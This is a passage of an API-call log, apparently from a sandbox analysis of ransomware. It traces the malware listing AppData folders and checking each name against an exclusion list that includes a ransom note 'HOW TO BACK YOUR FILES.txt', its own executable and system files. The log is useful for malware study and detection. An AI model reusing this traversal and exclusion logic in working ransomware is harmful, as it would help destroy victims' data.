lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe87fad35, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.308] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.308] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.308] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.308] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.308] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.308] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87fad35, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87fad35, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87fad35, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.308] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.308] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.308] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3385793c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x33c5d8bc, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x33c5d8bc, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Access", cAlternateFileName="")) returned 1 [0052.308] lstrcmpiW (lpString1="Access", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.308] lstrcmpiW (lpString1="Access", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.308] lstrcmpiW (lpString1="Access", lpString2="Rabbit4444.exe") returned -1 [0052.308] lstrcmpiW (lpString1="Access", lpString2=".") returned 1 [0052.308] lstrcmpiW (lpString1="Access", lpString2="..") returned 1 [0052.308] lstrcmpiW (lpString1="Access", lpString2="windows") returned -1 [0052.309] lstrcmpiW (lpString1="Access", lpString2="bootmgr") returned -1 [0052.309] lstrcmpiW (lpString1="Access", lpString2="pagefile.sys") returned -1 [0052.309] lstrcmpiW (lpString1="Access", lpString2="boot") returned -1 [0052.309] lstrcmpiW (lpString1="Access", lpString2="ids.txt") returned -1 [0052.309] lstrcmpiW (lpString1="Access", lpString2="NTUSER.DAT") returned -1 [0052.309] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Access" | out: lpString1="Access") returned="Access" [0052.309] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6548 [0052.309] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0xf1448 [0052.309] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6550 | out: ListHead=0xf68b0, ListEntry=0xf6550) returned 0xf6530 [0052.309] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208511b9, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x208511b9, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x208511b9, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2="Rabbit4444.exe") returned -1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2=".") returned 1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2="..") returned 1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2="windows") returned -1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2="bootmgr") returned -1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2="pagefile.sys") returned -1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2="boot") returned -1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2="ids.txt") returned -1 [0052.309] lstrcmpiW (lpString1="AddIns", lpString2="NTUSER.DAT") returned -1 [0052.309] lstrcpyW (in: lpString1=0x130eb8c, lpString2="AddIns" | out: lpString1="AddIns") returned="AddIns" [0052.309] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0052.309] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0xee618 [0052.309] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf6550 [0052.309] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0f124, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d0f124, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2d35364, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0052.309] lstrcmpiW (lpString1="Bibliography", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.309] lstrcmpiW (lpString1="Bibliography", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.309] lstrcmpiW (lpString1="Bibliography", lpString2="Rabbit4444.exe") returned -1 [0052.309] lstrcmpiW (lpString1="Bibliography", lpString2=".") returned 1 [0052.309] lstrcmpiW (lpString1="Bibliography", lpString2="..") returned 1 [0052.309] lstrcmpiW (lpString1="Bibliography", lpString2="windows") returned -1 [0052.309] lstrcmpiW (lpString1="Bibliography", lpString2="bootmgr") returned -1 [0052.309] lstrcmpiW (lpString1="Bibliography", lpString2="pagefile.sys") returned -1 [0052.309] lstrcmpiW (lpString1="Bibliography", lpString2="boot") returned -1 [0052.310] lstrcmpiW (lpString1="Bibliography", lpString2="ids.txt") returned -1 [0052.310] lstrcmpiW (lpString1="Bibliography", lpString2="NTUSER.DAT") returned -1 [0052.310] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Bibliography" | out: lpString1="Bibliography") returned="Bibliography" [0052.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0052.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6e) returned 0x117c20 [0052.310] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6590 [0052.310] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x39c1605f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd370742a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x39c1605f, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2="Rabbit4444.exe") returned -1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2=".") returned 1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2="..") returned 1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2="windows") returned -1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2="bootmgr") returned 1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2="pagefile.sys") returned -1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2="boot") returned 1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2="ids.txt") returned -1 [0052.310] lstrcmpiW (lpString1="Credentials", lpString2="NTUSER.DAT") returned -1 [0052.310] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Credentials" | out: lpString1="Credentials") returned="Credentials" [0052.310] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials", dwFileAttributes=0x2010) returned 1 [0052.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0052.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6c) returned 0x117860 [0052.310] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf6350 [0052.310] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789ca310, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789ca310, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0052.310] lstrcmpiW (lpString1="Crypto", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2="Rabbit4444.exe") returned -1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2=".") returned 1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2="..") returned 1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2="windows") returned -1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2="bootmgr") returned 1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2="pagefile.sys") returned -1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2="boot") returned 1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2="ids.txt") returned -1 [0052.311] lstrcmpiW (lpString1="Crypto", lpString2="NTUSER.DAT") returned -1 [0052.311] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Crypto" | out: lpString1="Crypto") returned="Crypto" [0052.311] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto", dwFileAttributes=0x10) returned 1 [0052.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0052.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0x1065f0 [0052.312] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf63f0 [0052.312] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ff935, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x32ff935, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x32ff935, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2="Rabbit4444.exe") returned -1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2=".") returned 1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2="..") returned 1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2="windows") returned -1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2="bootmgr") returned 1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2="pagefile.sys") returned -1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2="boot") returned 1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2="ids.txt") returned -1 [0052.312] lstrcmpiW (lpString1="Document Building Blocks", lpString2="NTUSER.DAT") returned -1 [0052.312] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Document Building Blocks" | out: lpString1="Document Building Blocks") returned="Document Building Blocks" [0052.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6448 [0052.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x86) returned 0x105a00 [0052.312] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6450 | out: ListHead=0xf68b0, ListEntry=0xf6450) returned 0xf6370 [0052.312] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208e9b07, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x12e96cf, ftLastWriteTime.dwHighDateTime=0x1d327c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0052.312] lstrcmpiW (lpString1="Excel", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.312] lstrcmpiW (lpString1="Excel", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.312] lstrcmpiW (lpString1="Excel", lpString2="Rabbit4444.exe") returned -1 [0052.312] lstrcmpiW (lpString1="Excel", lpString2=".") returned 1 [0052.312] lstrcmpiW (lpString1="Excel", lpString2="..") returned 1 [0052.312] lstrcmpiW (lpString1="Excel", lpString2="windows") returned -1 [0052.313] lstrcmpiW (lpString1="Excel", lpString2="bootmgr") returned 1 [0052.313] lstrcmpiW (lpString1="Excel", lpString2="pagefile.sys") returned -1 [0052.313] lstrcmpiW (lpString1="Excel", lpString2="boot") returned 1 [0052.313] lstrcmpiW (lpString1="Excel", lpString2="ids.txt") returned -1 [0052.313] lstrcmpiW (lpString1="Excel", lpString2="NTUSER.DAT") returned -1 [0052.313] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Excel" | out: lpString1="Excel") returned="Excel" [0052.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0052.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x60) returned 0x11c988 [0052.313] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6450 [0052.313] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3800a8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8923b24, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InputMethod", cAlternateFileName="INPUTM~1")) returned 1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2="Rabbit4444.exe") returned -1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2=".") returned 1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2="..") returned 1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2="windows") returned -1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2="bootmgr") returned 1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2="pagefile.sys") returned -1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2="boot") returned 1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2="ids.txt") returned 1 [0052.313] lstrcmpiW (lpString1="InputMethod", lpString2="NTUSER.DAT") returned -1 [0052.313] lstrcpyW (in: lpString1=0x130eb8c, lpString2="InputMethod" | out: lpString1="InputMethod") returned="InputMethod" [0052.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0052.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6c) returned 0x117a40 [0052.313] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6390 [0052.313] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xabc78877, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xabc78877, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2="Rabbit4444.exe") returned -1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows") returned -1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2="bootmgr") returned 1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2="pagefile.sys") returned -1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2="boot") returned 1 [0052.313] lstrcmpiW (lpString1="Internet Explorer", lpString2="ids.txt") returned 1 [0052.314] lstrcmpiW (lpString1="Internet Explorer", lpString2="NTUSER.DAT") returned -1 [0052.314] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Internet Explorer" | out: lpString1="Internet Explorer") returned="Internet Explorer" [0052.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0052.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x78) returned 0x10e168 [0052.314] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf63b0 [0052.314] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc79a26a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc79a26a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc79a26a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MMC", cAlternateFileName="")) returned 1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2="Rabbit4444.exe") returned -1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2=".") returned 1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2="..") returned 1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2="windows") returned -1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2="bootmgr") returned 1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2="pagefile.sys") returned -1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2="boot") returned 1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2="ids.txt") returned 1 [0052.314] lstrcmpiW (lpString1="MMC", lpString2="NTUSER.DAT") returned -1 [0052.314] lstrcpyW (in: lpString1=0x130eb8c, lpString2="MMC" | out: lpString1="MMC") returned="MMC" [0052.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0052.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x5c) returned 0x11cb28 [0052.314] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf6490 [0052.314] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS Project", cAlternateFileName="MSPROJ~1")) returned 1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2="Rabbit4444.exe") returned -1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2=".") returned 1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2="..") returned 1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2="windows") returned -1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2="bootmgr") returned 1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2="pagefile.sys") returned -1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2="boot") returned 1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2="ids.txt") returned 1 [0052.314] lstrcmpiW (lpString1="MS Project", lpString2="NTUSER.DAT") returned -1 [0052.314] lstrcpyW (in: lpString1=0x130eb8c, lpString2="MS Project" | out: lpString1="MS Project") returned="MS Project" [0052.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0052.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x117770 [0052.315] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6430 | out: ListHead=0xf68b0, ListEntry=0xf6430) returned 0xf6410 [0052.315] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab3fa09c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab3fa09c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0052.315] lstrcmpiW (lpString1="Network", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.315] lstrcmpiW (lpString1="Network", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.315] lstrcmpiW (lpString1="Network", lpString2="Rabbit4444.exe") returned -1 [0052.315] lstrcmpiW (lpString1="Network", lpString2=".") returned 1 [0052.315] lstrcmpiW (lpString1="Network", lpString2="..") returned 1 [0052.315] lstrcmpiW (lpString1="Network", lpString2="windows") returned -1 [0052.315] lstrcmpiW (lpString1="Network", lpString2="bootmgr") returned 1 [0052.315] lstrcmpiW (lpString1="Network", lpString2="pagefile.sys") returned -1 [0052.315] lstrcmpiW (lpString1="Network", lpString2="boot") returned 1 [0052.315] lstrcmpiW (lpString1="Network", lpString2="ids.txt") returned 1 [0052.315] lstrcmpiW (lpString1="Network", lpString2="NTUSER.DAT") returned -1 [0052.315] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Network" | out: lpString1="Network") returned="Network" [0052.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0052.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x64) returned 0x103988 [0052.315] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6430 [0052.315] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2525a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15925c1b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x15925c1b, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0052.315] lstrcmpiW (lpString1="Office", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.315] lstrcmpiW (lpString1="Office", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.315] lstrcmpiW (lpString1="Office", lpString2="Rabbit4444.exe") returned -1 [0052.315] lstrcmpiW (lpString1="Office", lpString2=".") returned 1 [0052.315] lstrcmpiW (lpString1="Office", lpString2="..") returned 1 [0052.315] lstrcmpiW (lpString1="Office", lpString2="windows") returned -1 [0052.315] lstrcmpiW (lpString1="Office", lpString2="bootmgr") returned 1 [0052.315] lstrcmpiW (lpString1="Office", lpString2="pagefile.sys") returned -1 [0052.315] lstrcmpiW (lpString1="Office", lpString2="boot") returned 1 [0052.315] lstrcmpiW (lpString1="Office", lpString2="ids.txt") returned 1 [0052.315] lstrcmpiW (lpString1="Office", lpString2="NTUSER.DAT") returned 1 [0052.315] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Office" | out: lpString1="Office") returned="Office" [0052.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6928 [0052.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0xf11e8 [0052.315] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6930 | out: ListHead=0xf68b0, ListEntry=0xf6930) returned 0xf64b0 [0052.315] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b1656b, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa8b1656b, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xdd629eb7, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0052.315] lstrcmpiW 